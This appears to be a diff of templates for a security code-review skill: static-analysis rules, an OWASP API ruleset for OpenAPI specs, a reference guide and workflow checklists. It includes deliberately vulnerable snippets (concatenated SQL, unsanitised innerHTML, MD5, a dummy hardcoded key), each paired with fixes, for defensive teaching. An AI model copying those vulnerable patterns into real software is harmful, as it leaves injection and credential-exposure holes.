Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,293 @@
# Comprehensive OWASP API Security Top 10 2023 Spectral Ruleset
# This ruleset enforces OWASP API Security best practices for OpenAPI specifications
extends: ["spectral:oas"]
rules:
# ============================================================================
# API1:2023 - Broken Object Level Authorization
# ============================================================================
operation-security-defined:
description: All operations must have security requirements defined (OWASP API1)
severity: error
given: $.paths[*][get,post,put,patch,delete,head]
then:
- field: security
function: truthy
message: "Operations must define security requirements to prevent unauthorized object access (OWASP API1:2023 - Broken Object Level Authorization)"
id-parameters-require-security:
description: Operations with ID parameters must have security defined
severity: error
given: $.paths[?(@property =~ /(\/\{id\}|\/\{.*[_-]id\})/i)][get,put,patch,delete]
then:
- field: security
function: truthy
message: "Operations with ID parameters require security to prevent IDOR vulnerabilities (OWASP API1:2023)"
# ============================================================================
# API2:2023 - Broken Authentication
# ============================================================================
security-schemes-required:
description: API must define security schemes (OWASP API2)
severity: error
given: $.components
then:
- field: securitySchemes
function: truthy
message: "API must define security schemes to prevent authentication bypass (OWASP API2:2023 - Broken Authentication)"
no-http-basic-auth:
description: HTTP Basic authentication is insecure for APIs
severity: error
given: $.components.securitySchemes[*]
then:
- field: scheme
function: pattern
functionOptions:
notMatch: "^basic$"
message: "HTTP Basic authentication transmits credentials in plain text - use OAuth2, API key, or JWT (OWASP API2:2023)"
bearer-format-specified:
description: Bearer authentication should specify token format (JWT recommended)
severity: warn
given: $.components.securitySchemes[?(@.type == 'http' && @.scheme == 'bearer')]
then:
- field: bearerFormat
function: truthy
message: "Bearer authentication should specify token format (bearerFormat: JWT) for clarity (OWASP API2:2023)"
# ============================================================================
# API3:2023 - Broken Object Property Level Authorization
# ============================================================================
no-additional-properties:
description: Prevent mass assignment by disabling additionalProperties
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
- field: additionalProperties
function: falsy
message: "Set additionalProperties to false to prevent mass assignment vulnerabilities (OWASP API3:2023 - Broken Object Property Level Authorization)"
schemas-have-properties:
description: Object schemas should explicitly define properties
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
- field: properties
function: truthy
message: "Explicitly define object properties to control data exposure (OWASP API3:2023)"
# ============================================================================
# API4:2023 - Unrestricted Resource Consumption
# ============================================================================
rate-limit-headers-documented:
description: API should document rate limiting headers
severity: warn
given: $.paths[*][get,post,put,patch,delete].responses[?(@property < '300')].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-RateLimit-Limit]
- required: [X-Rate-Limit-Limit]
- required: [RateLimit-Limit]
message: "Document rate limiting headers to communicate resource consumption limits (OWASP API4:2023 - Unrestricted Resource Consumption)"
pagination-parameters-present:
description: List operations should support pagination
severity: warn
given: $.paths[*].get
then:
- field: parameters
function: schema
functionOptions:
schema:
type: array
contains:
anyOf:
- properties:
name:
enum: [limit, per_page, page_size]
- properties:
name:
enum: [offset, page, cursor]
message: "List operations should support pagination (limit/offset or cursor) to prevent resource exhaustion (OWASP API4:2023)"
# ============================================================================
# API5:2023 - Broken Function Level Authorization
# ============================================================================
write-operations-require-security:
description: Write operations must have security requirements
severity: error
given: $.paths[*][post,put,patch,delete]
then:
- field: security
function: truthy
message: "Write operations must have security requirements to prevent unauthorized function access (OWASP API5:2023 - Broken Function Level Authorization)"
admin-paths-require-security:
description: Admin endpoints must have strict security
severity: error
given: $.paths[?(@property =~ /admin/i)][*]
then:
- field: security
function: truthy
message: "Admin endpoints require security requirements with appropriate scopes (OWASP API5:2023)"
# ============================================================================
# API7:2023 - Server Side Request Forgery
# ============================================================================
no-url-parameters:
description: Avoid URL parameters to prevent SSRF attacks
severity: warn
given: $.paths[*][*].parameters[?(@.in == 'query' || @.in == 'body')][?(@.name =~ /(url|uri|link|callback|redirect|webhook)/i)]
then:
function: truthy
message: "URL parameters can enable SSRF attacks - validate and whitelist destination URLs (OWASP API7:2023 - Server Side Request Forgery)"
# ============================================================================
# API8:2023 - Security Misconfiguration
# ============================================================================
servers-use-https:
description: All API servers must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URLs must use HTTPS protocol for secure communication (OWASP API8:2023 - Security Misconfiguration)"
no-example-servers:
description: Replace example server URLs with actual endpoints
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
notMatch: "example\\.com"
message: "Replace example.com with actual production server URLs (OWASP API8:2023)"
security-headers-in-responses:
description: Document security headers in responses
severity: info
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-Content-Type-Options]
- required: [X-Frame-Options]
- required: [Strict-Transport-Security]
- required: [Content-Security-Policy]
message: "Consider documenting security headers (X-Content-Type-Options, X-Frame-Options, HSTS, CSP) (OWASP API8:2023)"
# ============================================================================
# API9:2023 - Improper Inventory Management
# ============================================================================
api-version-required:
description: API specification must include version
severity: error
given: $.info
then:
- field: version
function: truthy
message: "API version must be specified for proper inventory management (OWASP API9:2023 - Improper Inventory Management)"
semantic-versioning-format:
description: Use semantic versioning for API versions
severity: warn
given: $.info.version
then:
function: pattern
functionOptions:
match: "^\\d+\\.\\d+(\\.\\d+)?$"
message: "Use semantic versioning format (MAJOR.MINOR.PATCH) for API versions (OWASP API9:2023)"
contact-info-required:
description: API must include contact information
severity: warn
given: $.info
then:
- field: contact
function: truthy
message: "Include contact information for API support and security reporting (OWASP API9:2023)"
deprecated-endpoints-documented:
description: Deprecated endpoints must document migration path
severity: warn
given: $.paths[*][*][?(@.deprecated == true)]
then:
- field: description
function: pattern
functionOptions:
match: "(deprecate|migrate|alternative|replacement|use instead)"
message: "Deprecated endpoints must document migration path and timeline (OWASP API9:2023)"
# ============================================================================
# API10:2023 - Unsafe Consumption of APIs
# ============================================================================
validate-external-api-responses:
description: Document validation of external API responses
severity: info
given: $.paths[*][*].responses[*].content[*].schema
then:
- field: description
function: truthy
message: "Document schema validation for all API responses, especially from external APIs (OWASP API10:2023 - Unsafe Consumption of APIs)"
# ============================================================================
# Additional Security Best Practices
# ============================================================================
no-pii-in-query-parameters:
description: Prevent PII exposure in URL query parameters
severity: error
given: $.paths[*][*].parameters[?(@.in == 'query')].name
then:
function: pattern
functionOptions:
notMatch: "(?i)(ssn|social.?security|credit.?card|password|secret|token|api.?key|private|passport|driver.?license)"
message: "Query parameters must not contain PII or sensitive data - use request body with HTTPS instead"
consistent-error-response-format:
description: Error responses should follow consistent format
severity: warn
given: $.paths[*][*].responses[?(@property >= '400')].content.application/json.schema
then:
function: schema
functionOptions:
schema:
type: object
required: [error, message]
message: "Error responses should follow consistent format with 'error' and 'message' fields"
no-verbose-error-details:
description: 5xx errors should not expose internal details
severity: warn
given: $.paths[*][*].responses[?(@property >= '500')].content[*].schema.properties
then:
function: schema
functionOptions:
schema:
type: object
not:
anyOf:
- required: [stack_trace]
- required: [stackTrace]
- required: [debug_info]
message: "5xx error responses should not expose stack traces or internal details in production"

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
# - Direct DOM manipulation (innerHTML, document.write)
# - React dangerouslySetInnerHTML with user data
# - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
